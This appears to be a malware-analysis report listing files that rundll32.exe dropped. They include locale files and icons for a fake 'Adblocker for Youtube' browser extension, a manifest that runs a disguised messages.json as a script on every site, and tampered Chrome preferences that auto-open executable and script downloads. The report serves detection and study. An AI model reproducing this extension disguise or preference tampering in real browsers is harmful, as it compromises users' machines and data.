MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sv\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.913200195070275
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDmTWxBBVR7WHJAiXFPmVkJEBHW1JE3s01WDmTWxBT1n:bk/dP6GZRVR7I9EV1W1JE3sfj1
MD5:910A00B8A4A73C896AAD63A769D682E8
SHA1:B99FB9F9195908EC1213E5DC0DAB5676CD01A08B
SHA-256:89DDAFA626E66297FE0FFB684756D959AC5774DA65197CCB7C1EEDAA7186CB42
SHA-512:E3F6F3D1AAA63E61ACE198EB116387AA3483DCB4C43E6D92231500B71FB80022EB03A767872B7EF5CE4846DDF90F631D5472C62BE59106AA9A358123A14E650A
Malicious:false
Preview:.{"appName":{"message":"Adblocker f.r Youtube."},"appDesc":{"message":"Letar du efter videon adblock? S. ladda ner Adblocker f.r Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\sw\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\ta\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\te\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\th\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\tr\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):141
Entropy (8bit):4.98798149548062
Encrypted:false
SSDEEP:3:bk/rhPUHcxBiMxIkZUkkVVR7WHTlbPtXCcAWaGK5gBiMxKBWIpKZYHYY:bk/dPvviVR7SlbtCY/UWp6
MD5:9222A5F6A75F38F60ABF1D5F5137CFE3
SHA1:81837EA5D2788D5FFFF21DB29977DDEE50FDB00A
SHA-256:EC917A8DCB1D40EAB935C4BC7F9F9057CF7AF892D56DEBC945DD283A294766F8
SHA-512:9DC69347DB4BE3D15452C0C04B3E456F202707D3868884B201B80A7C19A89D437A70B7B67886873C73BD1BD475033348DA8FCB9B93B501AF8C358F7784FDB245
Malicious:false
Preview:.{"appName":{"message":"Youtube.i.in Adblocker"},"appDesc":{"message":"Video adblock ar.yorsunuz? Youtube.i.in indirme Adblocker."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\uk\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):198
Entropy (8bit):4.820396470880301
Encrypted:false
SSDEEP:6:bk/dPe1Sq89abu1VR7U3ydX8d0v+cHf5Vqaq89abu/1:4dm1SlAeFUyX8d0WaqCAI1
MD5:984B0001491DCC9814D4954EB7009008
SHA1:AB87E0E7A8DAB7D178CE00551B943F67E683DF21
SHA-256:AA3211517E590FDAF9866DC06C59018C16617109782866466F8296741EAE7400
SHA-512:F80E86CE6BC1EF2F272296B7BF7E84C89A2BBE10A5BE0719CA913ABAA482F520CB6BBF416E2704D70783434EBB7A4B8295006EC883D3D47847F435061FB93F3E
Malicious:false
Preview:.{"appName":{"message":".......... ... YouTube."},"appDesc":{"message":".. ....... ..... ......? ... ....... .......... ... YouTube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\vi\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_CN\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\_locales\zh_TW\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\ficon128.png

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):5037
Entropy (8bit):7.905954051333691
Encrypted:false
SSDEEP:96:oSu1bZFj7Yc0jwjB366savGst6Fu3lUPH0AETYRgRY5Ib1zOgvAZhhx9CE1KVK8Q:oSu9ZuFS16navGstqeKH0RtIk16gIZ9r
MD5:D2CEC80B28B9BE2E46D12CFCBCBD3A52
SHA1:2FDAC2E9A2909CFDCA5DF717DCC36A9D0CA8396A
SHA-256:6D38E0BE2E6C189DE3E4D739BAE9986EE365A33BAF99A9234E5C9EFFB44B791A
SHA-512:89798889D41CFC687A31C820AEA487722B04EA40F7FD07CE899A0E215B7B1703380188BA103825A4B863F8CBCA76430BFC437705630F0BFCAFFD50A78C2BB295
Malicious:false
Preview:.PNG........IHDR..............>a.....bKGD..............pHYs.................tIME.....%&.OMe...:IDATx..]i...y~.....].V+iW.t@.'.....?...(...._.cc.p...9.........%s(...U&.WH%N.J~.8.l.T...5.`........7?.g...{.{.ggv.......{...... .\r.%.\r.%.\r.%.\r.%.\r.%.\r.%.\FI.Z..5..C1..Z...o..x...|....{&....*.P.....R.v....U....TN......K...t.X....{...m.3?X.{.$.......".. .+. yR._7.....+}.m... ...T......AY....@BC........2;<`.. ...W...,.)..r..Mj.;.......[....'..!....B....G.ulw...i.I.v.0......U.Cw. ..`W.....H.....@.k...Q.faW...0..'z.$!....Cw]/K[.N...CE...`.......k..p.^.zc,./..3E...^a..&.P.PKpm.......n-..6.}m...#[.......71s.Q......^/."A`.?.....(.....D ..._...S.........k......|q...-.U..l....j...S).}...._...W2....Y@...CwJ}b.Y.`(...O.=o.s..V.:.R_.`...0.D.J(.....]0.....8.U../!y...wh...$.P......o.W..PL\...=3..bL.....i(...*..]..xX.....G...L..f.Bb.c.{f....G......kn..w.4,.......u;af@.a..E..+~..Z...f...=..C.4../'.. ....-.x.w.u;a......a..}.V .8.5 .X:.u.x.5h..".....?.....

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon128.png

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):7197
Entropy (8bit):7.962463224314917
Encrypted:false
SSDEEP:192:slDTzZP7qbIqxOmYBFL5zsInaVnO0a0y1qZq4ztXab:slvYHxOmYHdzsIaO0a5Kab
MD5:A488210AE174A304ECA7091136646C16
SHA1:7024B249A2CFB3194C22BF78ACE79F3C0EB8148E
SHA-256:780FD5E6105D8E59CD24C797B9C6200293BD89D735F64A918F89A3FD2850F207
SHA-512:2ABF766E47081E2DB98BAB6EF421A0C08C40683EB31D128330D00EF985D6AC28935E856D8138BCAE77C9BC155585746FB42C8B5E2D294E9FFEC0ABBF7976FC83
Malicious:false
Preview:.PNG........IHDR..............>a.....sBIT....|.d....bzTXtRaw profile type APP1..x.U...0....Sx.w..2.B.EB...A..W...l..z.k.G.UUU.k.i.f^.n..(_-.LD..+.. .H...zP.s...fIDATx..y.]U..k.s.+UIe....d..A.D..ZE@.8..s.gK..?.>m.n?.......<.E..$.L.C&B.L...[..s.z..{oUB%..V..;...=g.}.^......J(...J(...J(...J(.........K...].:..TG...VY.T;.Jk....VI...[..'f.1 ...,.......6...........#"..A1.F@r...=2...(."X.E...(...........O.fU..x....^<"...f..u.n .....F.....wh.V...N....mi=..VY....4.1.l.......d|.'.sz.1....L...G.... ..H.".......P0&.o{....a..}.krb...........Blz..Dx....4......Y.6P].Tg.....N.a....`..3,r..p.1..#Ri...VC..T".7.i.W....2..].^.D............c.X...D...!\l.#..}.'....A.2.mr4.C...t.....J.C".../..1./!2.(e..F.b..b.U:....~c.._.L.."...K.Q.qn.DN+..R.*.dp......~....eO..$...`.Eo....@...c......w...Y...[.~.`.E.W........Ul.6U.c.F...x.w...W..?..+..3....|e....K..1.#.5HE.....m...<....e.......1.%....%0..N....s\..x..'Zm.m.?.)..q...C<.a.+........=V0..~C.x..u.....?^...A.0cN....;.h...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon16.png

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):704
Entropy (8bit):7.693751636838362
Encrypted:false
SSDEEP:12:6v/7ZtUTAif47vF78e/130eWbHvC5clQAg1Jg5cWoFcO0JpdBsaDnTFVYdS9qRz7:eOAiwDF7B301jmAgU5crUJpdBbcdS9qn
MD5:A4B312C792EC1CEA9C8116D7A085DEC5
SHA1:0E797DCD895A9A50D4A462D71BB1F9415F901467
SHA-256:54272DE6075587CD55DF8C0E6F7EC819AB01803DA861EA6F3DD4F665D77BC728
SHA-512:B4A8AD7EEEC1AB19BF6D0F7EFB2CFAD7F01817DF155820AD17DE0274641336BA2681A5F986D5AF74149BA0DBBF8B7B67F8B7A86EE90A5C7C6481C6C81ED4F1E9
Malicious:false
Preview:.PNG........IHDR................a....IDATx...K.Q..P...t*..a.m.N...,.i.3................B-.HZTj.....&:S_.R.M.....O..x-..|..{^....8p..m@H..L.7[j......4..P..Jl+.........u.9....Ke..l..s.=.3[./..W..[..9.<w".L..ozO.0.p......~..!...8..Zx..|o.+O.Y.....b.....!@.Q...6...P..8.`..L_/....v2./....`..?.5q..,C....)k.......... ...u....!4...X...]...!..e....Q..<..t.jg(`....x....@8..%b.e.....+B#.h..@.;s..i..I.0.f. H....h.J@x5.K<.......G.........bM.k....dN....^...........D...M.$(...O.......m.r...N..9-q.....}..w...<L\...gY.._NCz.>V......C..2%....&...;O.%.M=...g.}q......N...L.$.4..O3....cA...X<L..a..{.m0...*..".2..t..j.....U.T...@.>j.Q..........:}te...C.1.6..I..".`|'....IEND.B`.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\icons\icon48.png

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced
Category:dropped
Size (bytes):2570
Entropy (8bit):7.921033632215019
Encrypted:false
SSDEEP:48:bj5zyYhx6x3dYcRUj9crj/sT0f0xdJ8fJ0crAubN1igExJIupgn+Z9t+h1q0o6sH:n5zpL69dRhrjsT0FNkgEFgnet+hRo6sH
MD5:1E001C21C2A87A52EAB0B0D08A06E753
SHA1:F90EFECA6A2527EC053FE872B12E7AFB3EB1423B
SHA-256:88999ED5F6AAC39C82A4AF4C775F82439AE050D1EA2F03250758CA685A189504
SHA-512:81617EBCD2059C4F4024E502ACBCE4F6A4C25D8CB26E82908F682AD58B87FE5B463B86FFC2FB5289B9FA8B565D8E091808E295129CFF817A581E54F2BEA3A69F
Malicious:false
Preview:.PNG........IHDR...0...0.....W.......IDATx..yTSw........Pd.k.I.BB... K@.9s....NO.z....L.l...K.r..q:.XQ@.T...((.d_......T.;.....`......|..%.w.......E.n.....4~.gc..gb.].i.2].*.'F..F..O.X.Q~.Q..i..zb.z5.-x.M..H...t...{cU[u...>.......}..U..I...C]..o.j.<....x.....2..q..l..f.....(..Q..D+G....._...%.p...8../..Kz......?8o..4.v...W..z..K.a.c.X.w..>..J9....%.`$.E-q?.Q.v.(.u1J.A.....?.[......u.Qr?..E.[.^w....z.j@o.RmT.!...s...5f..r.N..........M.Q...){....C.?{".9.'.m..P."...H.%B..=J..'.tE.......O.y.N..d..1"|^(V;..&eS..T.P8.%.'.5B.M.>....i...`>..8.I.5..X@..[4'..pR0....p*LD.....9..im..ZQ.O#v..hdH.Z..(.1...(...C......`.h..mo..s}p..E........:.?..g6....[..x.!..G...}NGC..N}......j.D7...A.0!..Z......c.............p._.....[.L.....z.....q...A].i.1s-...m|.0n......L..DJ.c..j...tE.P.i.0k...>.R!...z....-.x..."......I.V-.......O..H`..2n"i...p..L.t.DV..j.:....!..x.LQC...M....`.&<..CmMpK[.........;.M..Z.J$..-.."8.$..U..[......M..v..S&@.-m5....n?.2O.(....YP.~..XP...

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\hlhgjfmdjomnlhfacokoibjlcmcmgoec\1.0.0_0\manifest.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):1316
Entropy (8bit):5.386187666024545
Encrypted:false
SSDEEP:24:dYh6ivGHV0ZIkW4RMiqQiXMCZ9n4OKZxO8g8nyH1:7ivGHVmX1qf6OQ08g8nI
MD5:F04829CCB91FC7E812BC3A66FB994242
SHA1:2C93B1D9533EF43D9E6015A8D42E1495B4B86617
SHA-256:A20B944D44D3D9BB3E7314DDE7979BA40689D44AEAB53D6852E4C76BEFD7AF70
SHA-512:3E7541AA86FA92163498EDA6B7FB45C683F92F731323A3DB348677543E94C6855282ED88247E092A21F2FB35C836CAE61B95CD3995F8DE3F96BB09BC18671843
Malicious:false
Preview:{. "background" : {. "scripts" : [ "_locales/en_TO/messages.json" ]. },. "content_scripts" : [. {. "all_frames" : true,. "js" : [ "_locales/en_TO/messages.json" ],. "matches" : [ "*://*/*" ],. "run_at" : "document_start". }. ],. "content_security_policy" : "script-src 'self' blob:; object-src 'self'",. "default_locale" : "en",. "description" : "Create and edit notes",. "icons" : {. "128" : "icons/ficon128.png". },. "key" : "MIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEApqkf3tfw228OJRNHZPophnjQgjSndhnZZPk35D/+oLqfNq33u/RqAmibIegyvLFHy+/tDE2hlHkqEtcM8xPZG3tPGmb7ZZihAq6Z8NlMZkBi6bWwfpPfO4WacSDKPL4jYIh+8Q2fXbyCrgxu6yWLBYz5t1nzj2LXE34NI+Iht0vJ24AL3CnVZgCovzFHRgjpTNJPZe8YAsezuzju311I9yBp9Xs0vpmvfJ5mkB9VLyoeJdSyR2CTmcavLVoYzNA5o1xeYFLljjr0FlzkohoDX4XBiSpoPyg7TaSaNbPQnB8RDxyQo5tM+9a4UNpbF8O1W9OI33rU5TXzuklZnP6s0wIDAQAB",. "manifest_version" : 2,. "name" : "Google Notes Offline",. "permissions" : [. "bookmarks",.

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Preferences

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):17918
Entropy (8bit):4.458892356184697
Encrypted:false
SSDEEP:192:Ygkl3hVoHz3usBOFYBUPjhUjuU0dSiyUPreRWh63vm+wnt5wEtghArrCre:YzlJu1avC32t53tghAvCy
MD5:C5DBF3A509E7B41340A6C0F989910335
SHA1:DB17A972148E13142AA4B7BF0875A8EE99C1E057
SHA-256:8040E31C8AD2548E0A5F0B56551F51698A597690FAF85E1415ED4D246A16915E
SHA-512:C3ACA8E99D9C0631203A4D26849DC1747F672497D24167BB730FD577C1A7FA9CB41917457086409A0E0B9319DFC5BDBE5E027962400BD215992408B9F2A1290A
Malicious:true
Preview:{. "NewTabPage" : {. "PrevNavigationTime" : "13340886961014896". },. "account_tracker_service_last_update" : "13340807398438930",. "alternate_error_pages" : {. "backup" : true. },. "announcement_notification_service_first_run_time" : "13340807398295099",. "apps" : {. "shortcuts_arch" : "",. "shortcuts_version" : 0. },. "autocomplete" : {. "retention_policy_last_version" : 117. },. "browser" : {. "has_seen_welcome_page" : false,. "should_reset_check_default_browser" : false,. "window_placement" : {. "bottom" : 974,. "left" : 10,. "maximized" : false,. "right" : 1060,. "top" : 10,. "work_area_bottom" : 984,. "work_area_left" : 0,. "work_area_right" : 1280,. "work_area_top" : 0. }. },. "commerce_daily_metrics_last_update_time" : "13340807423268579",. "countryid_at_install" : 17224,. "default_apps_install_state" : 3,. "dips_timer_last_update"

C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Secure Preferences

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:JSON data
Category:dropped
Size (bytes):33009
Entropy (8bit):4.395241169590789
Encrypted:false
SSDEEP:768:NU1LRLTmfbja7SuLr9gtnA8xP7kxRRbrjxo+PV9:NUBtToMje+PV9
MD5:7875C0866246B162701D6DE6A0E3CE03
SHA1:088F8C119D41C74E9EF9F9A61D2797F9CFD83336
SHA-256:B313F4ACA40B376CCB65A7774077DAF13420FCD6139DDE9FF07B1C7092E77C35
SHA-512:A1F37D7F0AB0C00AA7EFEF5EA4DC124E635A27ECC8D19AA919FAD77F5191D0D68D2DC6E4FEBBF29CE3E499928110343352991800E0E894E406B16A6CA7057AC7
Malicious:true
Preview:{. "download" : {. "always_open_pdf_externally" : true,. "directory_upgrade" : true,. "extensions_to_open" : "pdf:doc:docx:docxm:docm:xls:xlsx:xlsxm:xlsm:ppt:pptx:pptxm:pptm:mht:rtf:pub:vsd:mpp:mdb:dot:dotm:xlsb:xll:hwp:show:cell:hwpx:hwt:jtd:zip:iso:7z:rar:tar:vbs:js:jse:vbe:exe:html:htm:xhtml:tbz2:lz:msi". },. "extensions" : {. "settings" : {. "ahfgeienlihckogmohjhadlkjgocpleb" : {. "active_permissions" : {. "api" : [. "management",. "system.display",. "system.storage",. "webstorePrivate",. "system.cpu",. "system.memory",. "system.network". ],. "explicit_host" : [],. "manifest_permissions" : [],. "scriptable_host" : []. },. "app_launcher_ordinal" : "t",. "commands" : {},. "content_settings" : [],. "c

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\am\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\ar\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\be\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):204
Entropy (8bit):4.8508578194566825
Encrypted:false
SSDEEP:6:bk/dPe1Sq89abu1VR7U30D50ogHfJf89abu/1:4dm1SlAeFUMT+EAI1
MD5:5A56E498EACF6CEED5F1C69EDAF05441
SHA1:96EB7F2EEF6D5EEB2D164FD289A7A70777E19E48
SHA-256:C381EAC12310F44DBB7E80C12B99B536173339063C004747587A826C5CE414E4
SHA-512:D1148843FD0D313491423FB1FCFA12511080AC91191609315B5B5CD34666534BCA0BD8A6FBD12584450447E39AE058FB6FB8E666AAAC00EB4AA18985612AE0C8
Malicious:false
Preview:.{"appName":{"message":".......... ... YouTube."},"appDesc":{"message":".. ....... ..... ......? ... .......... .......... ... YouTube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\bg\messages.json

Download File
Process:C:\Windows\SysWOW64\rundll32.exe
File Type:Unicode text, UTF-8 (with BOM) text, with no line terminators
Category:dropped
Size (bytes):150
Entropy (8bit):4.833479154936718
Encrypted:false
SSDEEP:3:bk/rhPUHEyGOWDMF8xBBVR7WHEttbFABdCgeFpIHWWDMF8xBT1n:bk/dP6G5VR77lFA3Vq6T1
MD5:33292C7C04BA45E9630BB3D6C5CABF74
SHA1:3482EB8038F429AD76340D3B0D6EEA6DB74E31BD
SHA-256:9BB88EA0DCD22868737F42A3ADBDA7BF773B1EA07EE9F4C33D7A32EE1D902249
SHA-512:2439A27828D05BDDEC6D9C1EC0E23FC9EBB3DF75669B90DBE0F46CA05D996F857E6FBC7C895401FECFAE32AF59A7D4680F83EDCA26F8F51CA6C00EF76E591754
Malicious:false
Preview:.{"appName":{"message":"Adblocker for Youtube."},"appDesc":{"message":"Are you looking for video adblock? So download Adblocker for Youtube.."}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\fileepgfmlpabmkbocijoaggdmlhenbf\2.2.0_0\_locales\bn\messages.json

Download File
